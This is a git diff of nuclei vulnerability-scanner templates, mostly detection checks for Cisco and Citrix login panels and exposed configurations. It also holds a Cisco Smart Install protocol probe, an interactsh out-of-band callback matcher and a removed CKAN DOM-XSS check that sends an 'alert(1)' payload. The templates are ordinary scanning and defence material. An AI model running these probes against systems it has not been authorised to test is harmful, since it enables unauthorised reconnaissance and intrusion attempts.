matchers-condition: and - matchers: - - type: word - part: header - words: - - 'X-RateLimit-Limit-suite-gateway_suite-auth' - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: regex - part: interactsh_request - regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - - extractors: - - type: kval - kval: - - interactsh_ip - - - type: regex - part: interactsh_request - group: 2 - regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - - - type: regex - part: interactsh_request - group: 1 - regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - -# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/cisco-edge-340-936.yaml b/nuclei-templates/Other/cisco-edge-340-936.yaml deleted file mode 100644 index 9ab8a34c07..0000000000 --- a/nuclei-templates/Other/cisco-edge-340-936.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: cisco-edge-340 -info: - name: Cisco Edge 340 - author: dhiyaneshDk - severity: info - metadata: - shodan-query: http.title:"Cisco Edge 340" - tags: panel,cisco -requests: - - method: GET - path: - - "{{BaseURL}}/auth/?next=%2F" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Cisco Edge 340" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cisco-edge-340.yaml b/nuclei-templates/Other/cisco-edge-340.yaml new file mode 100644 index 0000000000..17a60b6a18 --- /dev/null +++ b/nuclei-templates/Other/cisco-edge-340.yaml @@ -0,0 +1,25 @@ +id: cisco-edge-340 + +info: + name: Cisco Edge 340 + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Edge 340"' + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/?next=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Edge 340" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/cisco-finesse-login-938.yaml b/nuclei-templates/Other/cisco-finesse-login-940.yaml similarity index 100% rename from nuclei-templates/Other/cisco-finesse-login-938.yaml rename to nuclei-templates/Other/cisco-finesse-login-940.yaml diff --git a/nuclei-templates/Other/cisco-integrated-login-941.yaml b/nuclei-templates/Other/cisco-integrated-login.yaml similarity index 100% rename from nuclei-templates/Other/cisco-integrated-login-941.yaml rename to nuclei-templates/Other/cisco-integrated-login.yaml diff --git a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml b/nuclei-templates/Other/cisco-meraki-exposure-944.yaml deleted file mode 100644 index d14835d3a6..0000000000 --- a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cisco-meraki-exposure - -info: - name: Cisco Meraki cloud & security Appliances Information Disclosure - author: dhiyaneshDK,r3naissance - severity: info - reference: - - https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco,meraki,disclosure - -requests: - - method: GET - path: - - '{{BaseURL}}/#connection' - - matchers-condition: and - matchers: - - type: word - words: - - 'Your client connection' - - 'This security appliance is directly connected to a local network' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cisco-meraki-exposure-946.yaml b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml new file mode 100644 index 0000000000..112800ebd8 --- /dev/null +++ b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml @@ -0,0 +1,25 @@ +id: cisco-meraki-exposure + +info: + name: Cisco Meraki cloud & security Appliances Information Disclosure + author: dhiyaneshDK,r3naissance + severity: info + reference: https://www.exploit-db.com/ghdb/6708 + tags: panel,cisco,meraki,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/#connection' + + matchers-condition: and + matchers: + - type: word + words: + - 'Your client connection' + - 'This security appliance is directly connected to a local network' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/cisco-network-config-949.yaml b/nuclei-templates/Other/cisco-network-config-949.yaml deleted file mode 100644 index 04d2a4045e..0000000000 --- a/nuclei-templates/Other/cisco-network-config-949.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: cisco-network-config - -info: - name: Cisco System Network Configuration Exposure - author: DhiyaneshDk - severity: low - reference: https://www.exploit-db.com/ghdb/5430 - tags: config,exposure,cisco,network - -requests: - - method: GET - path: - - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration" - - matchers-condition: and - matchers: - - type: word - words: - - "Network Configuration" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cisco-network-config-951.yaml b/nuclei-templates/Other/cisco-network-config-951.yaml new file mode 100644 index 0000000000..0de9a2b420 --- /dev/null +++ b/nuclei-templates/Other/cisco-network-config-951.yaml @@ -0,0 +1,25 @@ +id: cisco-network-config + +info: + name: Cisco System Network Configuration Exposure + author: DhiyaneshDk + severity: low + reference: + - https://www.exploit-db.com/ghdb/5430 + tags: config,exposure,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration" + + matchers-condition: and + matchers: + - type: word + words: + - "Network Configuration" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/cisco-prime-infrastructure.yaml b/nuclei-templates/Other/cisco-prime-infrastructure-954.yaml similarity index 100% rename from nuclei-templates/Other/cisco-prime-infrastructure.yaml rename to nuclei-templates/Other/cisco-prime-infrastructure-954.yaml diff --git a/nuclei-templates/Other/cisco-secure-desktop-960.yaml b/nuclei-templates/Other/cisco-secure-desktop-962.yaml similarity index 100% rename from nuclei-templates/Other/cisco-secure-desktop-960.yaml rename to nuclei-templates/Other/cisco-secure-desktop-962.yaml diff --git a/nuclei-templates/Other/cisco-sendgrid-967.yaml b/nuclei-templates/Other/cisco-sendgrid-967.yaml deleted file mode 100644 index d9708bf9f3..0000000000 --- a/nuclei-templates/Other/cisco-sendgrid-967.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: cisco-sendgrid - -info: - name: Cisco ServiceGrid - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/pages/sdcall/Login.jsp' - - matchers-condition: and - matchers: - - type: regex - regex: - - '(?m)^Cisco ServiceGrid (.*)<\/title>$' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '<div class="top\-margin">Version ([0-9.]+)<\/div>' diff --git a/nuclei-templates/Other/cisco-sendgrid-969.yaml b/nuclei-templates/Other/cisco-sendgrid-969.yaml new file mode 100644 index 0000000000..7148f305d0 --- /dev/null +++ b/nuclei-templates/Other/cisco-sendgrid-969.yaml @@ -0,0 +1,31 @@ +id: cisco-sendgrid + +info: + name: Cisco ServiceGrid + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 + tags: panel,cisco + +requests: + - method: GET + path: + - '{{BaseURL}}/pages/sdcall/Login.jsp' + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '<div class="top\-margin">Version ([0-9.]+)<\/div>' diff --git a/nuclei-templates/Other/cisco-smi-exposure-972.yaml b/nuclei-templates/Other/cisco-smi-exposure-972.yaml deleted file mode 100644 index c5a6584dd8..0000000000 --- a/nuclei-templates/Other/cisco-smi-exposure-972.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: cisco-smi-exposure - -info: - name: Cisco Smart Install Endpoints Exposure - author: dwisiswant0 - severity: info - description: Cisco Smart Install endpoints were discovered. Exposure of SMI to untrusted networks could allow complete compromise of the switch. - reference: - - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi - - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 - - https://github.com/Sab0tag3d/SIET - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: network,cisco,smi,exposure - -network: - - inputs: - - data: "000000010000000100000004000000080000000100000000" - type: hex - - host: - - "{{Hostname}}" - - "{{Host}}:4786" - - matchers: - - type: word - encoding: hex - words: - - "000000040000000000000003000000080000000100000000" - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/Other/cisco-smi-exposure.yaml b/nuclei-templates/Other/cisco-smi-exposure.yaml new file mode 100644 index 0000000000..212bbf0f1b --- /dev/null +++ b/nuclei-templates/Other/cisco-smi-exposure.yaml @@ -0,0 +1,33 @@ +id: cisco-smi-exposure + +info: + name: Cisco Smart Install Endpoints Exposure + author: dwisiswant0 + severity: info + description: | + This template attempts & supports the detection part only by + connecting to the specified Cisco Smart Install port and determines + if it speaks the Smart Install Protocol. Exposure of SMI to + untrusted networks can allow complete compromise of the switch. + reference: + - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html + - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature + - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi + - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 + - https://github.com/Sab0tag3d/SIET + tags: network,cisco,smi,exposure + +network: + - inputs: + - data: "000000010000000100000004000000080000000100000000" + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:4786" + + matchers: + - type: word + encoding: hex + words: + - "000000040000000000000003000000080000000100000000" diff --git a/nuclei-templates/Other/cisco-systems-login-973.yaml b/nuclei-templates/Other/cisco-systems-login-973.yaml new file mode 100644 index 0000000000..96ae7b9ee4 --- /dev/null +++ b/nuclei-templates/Other/cisco-systems-login-973.yaml @@ -0,0 +1,32 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk,idealphase + severity: info + metadata: + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '<script src="javascript\/translate\.js\?ver=(.+)"><\/script>' diff --git a/nuclei-templates/Other/cisco-systems-login.yaml b/nuclei-templates/Other/cisco-systems-login.yaml deleted file mode 100644 index 25607b3bbf..0000000000 --- a/nuclei-templates/Other/cisco-systems-login.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: cisco-systems-login - -info: - name: Cisco Systems Login - author: dhiyaneshDk - severity: info - tags: panel,cisco - metadata: - shodan-query: 'http.title:"Cisco Systems Login"' - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<TITLE>Cisco Systems Login" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cisco-telepresence.yaml b/nuclei-templates/Other/cisco-telepresence.yaml index adc3eca85a..93a3d7423f 100644 --- a/nuclei-templates/Other/cisco-telepresence.yaml +++ b/nuclei-templates/Other/cisco-telepresence.yaml @@ -4,9 +4,9 @@ info: name: Cisco Telepresence author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Telepresence"' + shodan-query: http.title:"Cisco Telepresence" + tags: panel,cisco requests: - method: GET diff --git a/nuclei-templates/Other/citrix-vpn-detect-987.yaml b/nuclei-templates/Other/citrix-vpn-detect-987.yaml index 51248b8c91..96c7e2071e 100644 --- a/nuclei-templates/Other/citrix-vpn-detect-987.yaml +++ b/nuclei-templates/Other/citrix-vpn-detect-987.yaml @@ -2,9 +2,8 @@ id: citrix-vpn-detect info: name: Citrix VPN Detection - author: pdteam + author: bauthard severity: info - tags: panel,citrix requests: - method: GET diff --git a/nuclei-templates/Other/ckan-dom-based-xss-992.yaml b/nuclei-templates/Other/ckan-dom-based-xss-992.yaml deleted file mode 100644 index 7cc02f4bf3..0000000000 --- a/nuclei-templates/Other/ckan-dom-based-xss-992.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: ckan-dom-based-xss - -info: - name: CKAN DOM Based XSS - author: dhiyaneshDk - severity: medium - description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS. - reference: - - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27 - tags: dom,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/?{alert(1)}' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '